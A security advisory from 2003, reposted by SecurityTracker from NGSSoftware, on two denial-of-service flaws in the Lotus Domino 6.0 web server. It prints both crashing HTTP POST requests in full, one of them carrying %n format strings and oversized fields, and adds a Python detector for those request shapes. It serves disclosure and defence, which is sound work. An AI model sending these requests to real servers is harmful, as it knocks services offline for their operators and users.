Lotus Domino Web Server Can Be Crashed With Incomplete or Invalid POST Request
SecurityTracker Alert ID: 1007541
CVE Reference: CAN-2003-0180, CAN-2003-0181
Updated: Dec 1 2003
Original Entry Date: Aug 20 2003
Impact: Denial of service via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Advisory: NGSSoftware
Version(s): 5.x, 6.0
Description: A denial of service vulnerability was reported in the Lotus Domino web server (nhttp.exe). A remote user can cause the web server to crash.

NGSSoftware Insight Security reported [on February 17, 2003] that a buffer overflow in the Lotus Domino web server allows a remote user to crash the web service. The web service must be restarted to return to normal operations.

A remote user can reportedly send an incomplete POST request using the s_Validation form to trigger the flaw. A remote user can also send a POST request using the h_PageUI form with a non-existent parameter to trigger the flaw, according to the report.

Some demonstration exploit URLs are provided in the Source Message.
Impact: A remote user can cause the Domino web services to crash.

Solution: The vendor has released a fixed version (6.0.1), available as described in Lotus document #1104528 (2003-02-21) at:
http://www-1.ibm.com/support/docview.wss?uid=swg21104528

Vendor URL: www.nextgenss.com/advisories/lotus-60dos.txt

Cause: Boundary error

Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
Message History: None.

Source Message Contents

Date: Wed, 20 Aug 2003 12:11:22 -0400
Subject: http://www.nextgenss.com/advisories/lotus-60dos.txt
NGSSoftware Insight Security Research Advisory
Name: LOTUS DOMINO Denial Of Service Attacks 1 & 2
Systems Affected: Release 6.0
Severity: Critical Risk
Category: Remote System Buffer Overrun
Vendor URL: http://www.lotus.com
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 17th February 2003
Advisory number: #NISR17022003d
Description
***********
Lotus Domino and Notes together provide a full-featured enterprise collaboration system,
with Domino providing the application server services. Based on Netcraft's (www.netcraft.com)
January 2003 Server Survey, Lotus Domino is positioned 10th in the web server market,
with a count of 78,031 in that survey.
Details
*******
There are two ways in which a denial of service attack can be launched against the web
services of Lotus Domino (nhttp.exe). In both instances, the web services would have to
be restarted by the Domino administrator.
Attack 1 - Incomplete POST Request

POST /test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=s_NotesForm;JournalEntry HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://ngssoftware/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_New,s_NotesForm;JournalEntry
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ngssoftware
Content-Length: 8111
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=ui:I&DNIDate:20021212&CalIDate:20021212&AMActive:1&NMTLP:20021217T032503Z&NMCount:0&CalView:D; iwaSSL=0
Attack 2 - Fictitious Value Field POST Request

POST /test2.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation&PresetFields=s_ValId;MailPreferenceEdit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://192.168.0.1/test2.nsf/iNotes/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_New,s_NotesForm;ShimmerMailPref
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.3); .NET CLR 1.0.3705)
Host: 192.168.0.1
Content-Length: 2548
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=DNIDate:20030114&CalIDate:20030114&NMTLP:20030114T191749Z&NMCount:0&SI_TLM:20030115T020722%2C40Z&MOFolder:%28%24Drafts%29&MOFolderLabel:Drafts&MOTLM:20030115T000509%2C10Z&ui:I; iwaSSL=0
%25%25PostCharset=ISO-8859-1&&EXCLUDEFROMVIEW=null&s_BrowserSuffix=mybrowser&h_CurrentSkinName=me&h_CurrentSkinType=myskin&s_UNH=%n%n%n%n%n%n%n&s_UNH=abcdefg&s_UNH=qwerty&VAL_ExpandGroup=0&VAL_Type=1&VAL_Exhaustive=1&VAL_DoConflictCheck=1&VAL_UNID=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB&VAL_Invitees=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC&VAL_DateTimeList=DDDDDDDDDDDDDDDDDDDDDDDDDDD&Data=liberty&AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
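As an added example (not code from the NGSSoftware advisory or from IBM), the following Python check flags, in captured HTTP requests, the two request shapes shown above: a POST whose Content-Length exceeds the body actually received, and a Domino `?EditDocument&Form=...` POST whose fields carry `%n` runs or oversized values. The thresholds, host names and the three sample requests are constructed assumptions; it is a monitoring aid for a defender, not a scanner.

```python
"""Constructed detector for the two nhttp.exe POST shapes in this advisory (added example, not NGS or IBM code)."""
from urllib.parse import parse_qsl

MAX_FIELD_LEN = 1024   # assumed: longest name+value a legitimate form field needs
MIN_FORMAT_RUNS = 3    # assumed: fewer %n occurrences than this are ignored

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def check_request(raw: bytes) -> list:
    """Return human-readable findings for one request (empty list means clean)."""
    method, target, headers, body = parse_request(raw)
    findings = []
    if method != "POST":
        return findings
    # Attack 1 shape: Content-Length promises more body than the client ever sends.
    declared = int(headers.get("content-length", "0"))
    if declared > len(body):
        findings.append(f"incomplete POST: declared {declared} bytes, received {len(body)}")
    # Field checks apply only to Domino form submissions (?EditDocument&Form=...).
    query = target.partition("?")[2]
    form = dict(parse_qsl(query)).get("Form")
    if "EditDocument" not in query or form is None:
        return findings
    for name, value in parse_qsl(body.decode("latin-1"), keep_blank_values=True):
        # Attack 2 shape: %n format specifiers (Attack 1 carries them URL-encoded as %25n).
        if value.count("%n") >= MIN_FORMAT_RUNS:
            findings.append(f"form {form}: field {name} carries %n format specifiers")
        # Oversized field, like the long filler value in the second request above.
        if len(name) + len(value) > MAX_FIELD_LEN:
            findings.append(f"form {form}: field {name[:16]} spans {len(name) + len(value)} bytes")
    return findings

# Constructed samples modelled on the advisory's requests (bodies shortened).
CLEAN = (b"POST /mail.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation HTTP/1.1\r\n"
         b"Host: domino.example\r\nContent-Length: 17\r\n\r\nVAL_Type=1&Data=x")
TRUNCATED = (b"POST /mail.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI HTTP/1.1\r\n"
             b"Host: domino.example\r\nContent-Length: 8111\r\n\r\nh_Name=foobar")
FORMAT_STR = (b"POST /mail.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation HTTP/1.1\r\n"
              b"Host: domino.example\r\nContent-Length: 2030\r\n\r\n"
              b"s_UNH=%n%n%n%n%n%n%n&VAL_UNID=" + b"B" * 2000)
```

Feed `check_request` each request reassembled by a proxy or IDS; an incomplete POST can only be judged once the connection closes, since a slow but legitimate client also looks truncated mid-stream.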
Fix Information
***************
IBM Lotus Notes and Domino Release 6.0.1 is currently available and is being marketed as the
first maintenance release. IBM's announcement goes on to say that if customers haven't already
upgraded or migrated to Notes and Domino 6, now is the time to move and start reaping the
benefits of this exciting and highly praised release, and that Release 6.0.1 includes fixes to
enhance the quality and reliability of the Notes and Domino 6 products. It does not, however,
mention any security issues, and NGS would strongly advise upgrading as soon as possible, not
to reap the benefits but to secure yourself and your data against possible web-based or
network attacks.

The upgrade / patch can be obtained from
http://www14.software.ibm.com/webapp/download/search.jsp?q=&cat=&pf=&k=&dt=&go=y&rs=ESD-NOTECLNTi&S_TACT=&S_CMP=&sb=r

A check for these issues has been added to DominoScan R2, a comprehensive automated
intelligent assessment tool for Lotus Domino servers; more information is available from the
NGSSoftware website, http://www.ngssoftware.com/software/dominoscan.html
Further Information
*******************
For further information about the scope and effects of buffer overflows, please see
http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf